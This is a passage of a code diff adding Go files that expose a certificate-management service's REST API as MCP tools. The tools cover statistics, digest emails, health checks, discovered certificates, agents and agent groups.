data, err := c.Get("/api/v1/stats/certificates-by-status", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_expiration_timeline",
|
||||||
|
Description: "Get certificates expiring per day for the next N days (default 30, max 365).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input TimelineInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := url.Values{}
|
||||||
|
if input.Days > 0 {
|
||||||
|
q.Set("days", strconv.Itoa(input.Days))
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/stats/expiration-timeline", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_job_trends",
|
||||||
|
Description: "Get job success/failure trends per day for the past N days (default 30, max 365).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input TimelineInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := url.Values{}
|
||||||
|
if input.Days > 0 {
|
||||||
|
q.Set("days", strconv.Itoa(input.Days))
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/stats/job-trends", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_issuance_rate",
|
||||||
|
Description: "Get new certificate issuance count per day for the past N days (default 30, max 365).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input TimelineInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := url.Values{}
|
||||||
|
if input.Days > 0 {
|
||||||
|
q.Set("days", strconv.Itoa(input.Days))
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/stats/issuance-rate", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Digest ──────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerDigestTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_preview_digest",
|
||||||
|
Description: "Preview the scheduled certificate digest email in HTML format. Shows summary of certificate status, pending jobs, and expiring certificates.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/digest/preview", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_send_digest",
|
||||||
|
Description: "Trigger immediate sending of the certificate digest email to configured recipients. If no explicit recipients are configured, sends to certificate owners.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/digest/send", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Metrics ─────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerMetricsTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_metrics",
|
||||||
|
Description: "Get system metrics snapshot: gauge metrics (cert/agent/job counts), counters (completed/failed totals), and server uptime.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/metrics", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Health ──────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerHealthTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_health",
|
||||||
|
Description: "Check certctl server health status.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/health", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_ready",
|
||||||
|
Description: "Check certctl server readiness (database connectivity, etc.).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/ready", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_auth_info",
|
||||||
|
Description: "Get auth configuration (auth type and whether auth is required).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/auth/info", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_auth_check",
|
||||||
|
Description: "Validate that the configured API key is accepted by the server.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/auth/check", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
// I-2 closure (cat-i-b0924b6675f8): pre-I-2 the README claimed "all
|
||||||
|
// API endpoints are exposed via MCP" but the discovered-certificate
|
||||||
|
// lifecycle (claim + dismiss) was never wrapped — operators using
|
||||||
|
// MCP clients had no path to bring an
|
||||||
|
// out-of-band cert under management or to mark a benign discovery
|
||||||
|
// as not-of-interest without dropping to the REST API directly.
|
||||||
|
// These two tools wrap the existing HTTP handlers
|
||||||
|
// (DiscoveryHandler.ClaimDiscovered + DismissDiscovered).
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_claim_discovered_certificate",
|
||||||
|
Description: "Link a discovered certificate (dc-*) to an existing managed certificate (mc-*) via POST /api/v1/discovered-certificates/{id}/claim. Use this to bring an out-of-band cert (e.g. one found by an agent filesystem scan or a network scan) under certctl management without re-issuing — the discovered row is marked Managed and its managed_certificate_id is set so subsequent renewals/revocations on the managed cert update both rows.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ClaimDiscoveredCertificateInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]string{"managed_certificate_id": input.ManagedCertificateID}
|
||||||
|
data, err := c.Post("/api/v1/discovered-certificates/"+input.ID+"/claim", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_dismiss_discovered_certificate",
|
||||||
|
Description: "Dismiss a discovered certificate (POST /api/v1/discovered-certificates/{id}/dismiss). Use this to mark a discovery as not-of-interest (e.g. expired self-signed test certs found by a network scan) — the row stops appearing in the unmanaged-list view but is preserved in the DB for audit history.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input DismissDiscoveredCertificateInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/discovered-certificates/"+input.ID+"/dismiss", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Health Checks (Phase B — P1-20..P1-27) ──────────────────────────
|
||||||
|
//
|
||||||
|
// 2026-05-05 CLI/API/MCP↔GUI parity audit closure. AI-assistant queries like
|
||||||
|
// "are any health checks failing?" / "ack the prod nginx incident" had no
|
||||||
|
// MCP path — operators had to drop to curl. Mirrors the existing target
|
||||||
|
// resource shape (CRUD + history + summary + acknowledge).
|
||||||
|
|
||||||
|
func registerHealthCheckTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_health_checks",
|
||||||
|
Description: "List monitored TLS endpoint health checks (GET /api/v1/health-checks). Optional filters: status, certificate_id, network_scan_target_id, enabled.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListHealthChecksInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
if input.Status != "" {
|
||||||
|
q.Set("status", input.Status)
|
||||||
|
}
|
||||||
|
if input.CertificateID != "" {
|
||||||
|
q.Set("certificate_id", input.CertificateID)
|
||||||
|
}
|
||||||
|
if input.NetworkScanTargetID != "" {
|
||||||
|
q.Set("network_scan_target_id", input.NetworkScanTargetID)
|
||||||
|
}
|
||||||
|
if input.Enabled != "" {
|
||||||
|
q.Set("enabled", input.Enabled)
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/health-checks", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_health_check_summary",
|
||||||
|
Description: "Return aggregate counts of TLS health-check states (GET /api/v1/health-checks/summary). Useful for dashboard-style queries about endpoint posture.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/health-checks/summary", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_health_check",
|
||||||
|
Description: "Get a single TLS endpoint health check (GET /api/v1/health-checks/{id}).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/health-checks/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_health_check",
|
||||||
|
Description: "Create a TLS endpoint health check (POST /api/v1/health-checks). Required: endpoint (host:port). Server-side defaults: check_interval_seconds=300, degraded_threshold=2, down_threshold=5.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateHealthCheckInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/health-checks", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_health_check",
|
||||||
|
Description: "Update a TLS endpoint health check (PUT /api/v1/health-checks/{id}). The handler performs a merge update: non-zero numeric fields and non-empty strings overwrite, zero values preserve existing.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateHealthCheckInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/health-checks/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_health_check",
|
||||||
|
Description: "Delete a TLS endpoint health check (DELETE /api/v1/health-checks/{id}).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/health-checks/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_health_check_history",
|
||||||
|
Description: "Get probe history for a TLS endpoint health check (GET /api/v1/health-checks/{id}/history). Default limit 100; max 1000 (clamped server-side).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input HealthCheckHistoryInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := url.Values{}
|
||||||
|
if input.Limit > 0 {
|
||||||
|
q.Set("limit", strconv.Itoa(input.Limit))
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/health-checks/"+input.ID+"/history", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_acknowledge_health_check",
|
||||||
|
Description: "Acknowledge a TLS health-check incident (POST /api/v1/health-checks/{id}/acknowledge). Marks the check Acknowledged=true; the handler records the actor (defaults to 'unknown' if absent) for the audit trail.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input AcknowledgeHealthCheckInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := struct {
|
||||||
|
Actor string `json:"actor,omitempty"`
|
||||||
|
}{Actor: input.Actor}
|
||||||
|
data, err := c.Post("/api/v1/health-checks/"+input.ID+"/acknowledge", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
@@ -0,0 +1,266 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package mcp
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"fmt"
|
||||||
|
"net/url"
|
||||||
|
|
||||||
|
gomcp "github.com/modelcontextprotocol/go-sdk/mcp"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 10 (2026-05-14): extracted from
|
||||||
|
// internal/mcp/tools.go via the Option B sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file groups the agent-management MCP tool domain: per-agent
|
||||||
|
// CRUD + lifecycle (registerAgentTools — register / list / get /
|
||||||
|
// retire / heartbeat / poll / claim / verify / discoveries) and the
|
||||||
|
// agent-group surface (registerAgentGroupTools — group CRUD +
|
||||||
|
// membership). Phase G P1-33 (POST /api/v1/agents/{id}/discoveries)
|
||||||
|
// stays intentionally absent from the MCP surface per the comment
|
||||||
|
// in tools.go::RegisterTools — that endpoint is the
|
||||||
|
// machine-to-machine path agents use to push filesystem-scan
|
||||||
|
// reports, not an operator-driven flow worth exposing to LLM
|
||||||
|
// consumers.
|
||||||
|
|
||||||
|
// ── Agents ──────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerAgentTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_agents",
|
||||||
|
Description: "List all registered agents with status, OS, architecture, and version info.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/agents", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_agent",
|
||||||
|
Description: "Get agent details including status, last heartbeat, OS, architecture, IP, and version.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/agents/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_register_agent",
|
||||||
|
Description: "Register a new agent. Requires name and hostname. Returns 409 if an agent with the same name already exists.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input RegisterAgentInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/agents", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_agent_heartbeat",
|
||||||
|
Description: "Send agent heartbeat with optional metadata (OS, architecture, IP, version). Returns 404 if agent not found.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input struct {
|
||||||
|
ID string `json:"id" jsonschema:"Agent ID"`
|
||||||
|
Version string `json:"version,omitempty" jsonschema:"Agent version"`
|
||||||
|
Hostname string `json:"hostname,omitempty" jsonschema:"Hostname"`
|
||||||
|
OS string `json:"os,omitempty" jsonschema:"Operating system"`
|
||||||
|
Architecture string `json:"architecture,omitempty" jsonschema:"CPU architecture"`
|
||||||
|
IPAddress string `json:"ip_address,omitempty" jsonschema:"IP address"`
|
||||||
|
}) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]string{}
|
||||||
|
if input.Version != "" {
|
||||||
|
body["version"] = input.Version
|
||||||
|
}
|
||||||
|
if input.Hostname != "" {
|
||||||
|
body["hostname"] = input.Hostname
|
||||||
|
}
|
||||||
|
if input.OS != "" {
|
||||||
|
body["os"] = input.OS
|
||||||
|
}
|
||||||
|
if input.Architecture != "" {
|
||||||
|
body["architecture"] = input.Architecture
|
||||||
|
}
|
||||||
|
if input.IPAddress != "" {
|
||||||
|
body["ip_address"] = input.IPAddress
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/agents/"+input.ID+"/heartbeat", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_agent_submit_csr",
|
||||||
|
Description: "Submit a PEM-encoded CSR from an agent for signing.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input AgentCSRInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]string{"csr_pem": input.CSRPEM}
|
||||||
|
if input.CertificateID != "" {
|
||||||
|
body["certificate_id"] = input.CertificateID
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/agents/"+input.AgentID+"/csr", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_agent_pickup_certificate",
|
||||||
|
Description: "Agent picks up a signed certificate after CSR has been processed.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input AgentPickupInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/agents/"+input.AgentID+"/certificates/"+input.CertID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_agent_get_work",
|
||||||
|
Description: "Get pending work items (deployment jobs, AwaitingCSR jobs) for an agent.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/agents/"+input.ID+"/work", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_agent_report_job_status",
|
||||||
|
Description: "Agent reports completion or failure of an assigned job.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input AgentJobStatusInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]string{"status": input.Status}
|
||||||
|
if input.Error != "" {
|
||||||
|
body["error"] = input.Error
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/agents/"+input.AgentID+"/jobs/"+input.JobID+"/status", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
// I-004: soft-retirement. DELETE /api/v1/agents/{id} returns 200 on a
|
||||||
|
// fresh retire (body echoes retired_at/already_retired/cascade/counts),
|
||||||
|
// 204 on an idempotent retire of an already-retired agent (do() in
|
||||||
|
// client.go normalizes that to {"status":"deleted"}), 409 when downstream
|
||||||
|
// dependencies block the retire and force wasn't set, 403 on sentinel
|
||||||
|
// agents, or 400 when force=true was sent without a reason. The tool
|
||||||
|
// forwards the raw handler response so the LLM operator sees the
|
||||||
|
// dependency counts and can decide whether to retry with force=true.
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_retire_agent",
|
||||||
|
Description: "Soft-retire an agent (DELETE /api/v1/agents/{id}). Sets retired_at + retired_reason on the row; the agent is filtered from the default listing and surfaces only via certctl_list_retired_agents. Default is a safety-gated soft-retire that returns 409 blocked_by_dependencies if the agent has active targets, active certificates, or pending jobs — the returned counts tell you what would be orphaned. Pass force=true to cascade through and retire those dependents too; force=true requires a non-empty reason (captured in the audit trail). Sentinel discovery agents (server-scanner, cloud-aws-sm, cloud-azure-kv, cloud-gcp-sm) cannot be retired — the handler returns 403 unconditionally. Idempotent: retrying on an already-retired agent returns 204 without side effects.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input RetireAgentInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
// Client-side mirror of the handler's ErrForceReasonRequired contract
|
||||||
|
// (see internal/api/handler/agents.go) so the LLM gets an immediate,
|
||||||
|
// actionable error instead of a round-trip 400. Whitespace-only
|
||||||
|
// reasons are treated as empty — matches handler's TrimSpace check.
|
||||||
|
if input.Force && input.Reason == "" {
|
||||||
|
return errorResult(fmt.Errorf("reason is required when force=true"))
|
||||||
|
}
|
||||||
|
query := url.Values{}
|
||||||
|
if input.Force {
|
||||||
|
query.Set("force", "true")
|
||||||
|
}
|
||||||
|
if input.Reason != "" {
|
||||||
|
query.Set("reason", input.Reason)
|
||||||
|
}
|
||||||
|
data, err := c.DeleteWithQuery("/api/v1/agents/"+input.ID, query)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
// I-004: retired agents are filtered out of GET /api/v1/agents by default.
|
||||||
|
// The /agents/retired endpoint is the opt-in view — same pagination shape
|
||||||
|
// as the default listing, but filters to rows where retired_at IS NOT NULL.
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_retired_agents",
|
||||||
|
Description: "List soft-retired agents (GET /api/v1/agents/retired). These are agents that have been retired via certctl_retire_agent; retired_at and retired_reason are populated. Returned separately from certctl_list_agents so the default listing stays focused on operational agents.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/agents/retired", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Agent Groups ────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerAgentGroupTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_agent_groups",
|
||||||
|
Description: "List agent groups with dynamic matching criteria (OS, architecture, IP CIDR, version).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/agent-groups", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_agent_group",
|
||||||
|
Description: "Get agent group details including matching criteria.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/agent-groups/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_agent_group",
|
||||||
|
Description: "Create a new agent group with dynamic matching criteria. Requires name.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateAgentGroupInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/agent-groups", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_agent_group",
|
||||||
|
Description: "Update an agent group's name, description, or matching criteria.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateAgentGroupInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/agent-groups/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_agent_group",
|
||||||
|
Description: "Delete an agent group.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/agent-groups/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_agent_group_members",
|
||||||
|
Description: "List agents that are members of a group (by dynamic criteria and manual membership).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/agent-groups/"+input.ID+"/members", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
@@ -0,0 +1,404 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package mcp
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"fmt"
|
||||||
|
|
||||||
|
gomcp "github.com/modelcontextprotocol/go-sdk/mcp"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 10 (2026-05-14): extracted from
|
||||||
|
// internal/mcp/tools.go via the Option B sibling-file pattern. Package
|
||||||
|
// stays `mcp`; every external caller of RegisterTools(...) resolves
|
||||||
|
// the same way — pure mechanical relocation. The dispatcher in
|
||||||
|
// tools.go still calls registerCertificateTools / registerCRLOCSPTools
|
||||||
|
// / registerRenewalPolicyTools / registerVerificationTools in the
|
||||||
|
// same order, just from this file.
|
||||||
|
//
|
||||||
|
// This file groups the certificate-lifecycle MCP tool domain:
|
||||||
|
// certificate CRUD + revocation (registerCertificateTools), CRL/OCSP
|
||||||
|
// surface (registerCRLOCSPTools), renewal-policy management
|
||||||
|
// (registerRenewalPolicyTools — Phase C of the 2026-05-05 parity
|
||||||
|
// audit), and certificate-verification tooling (registerVerificationTools
|
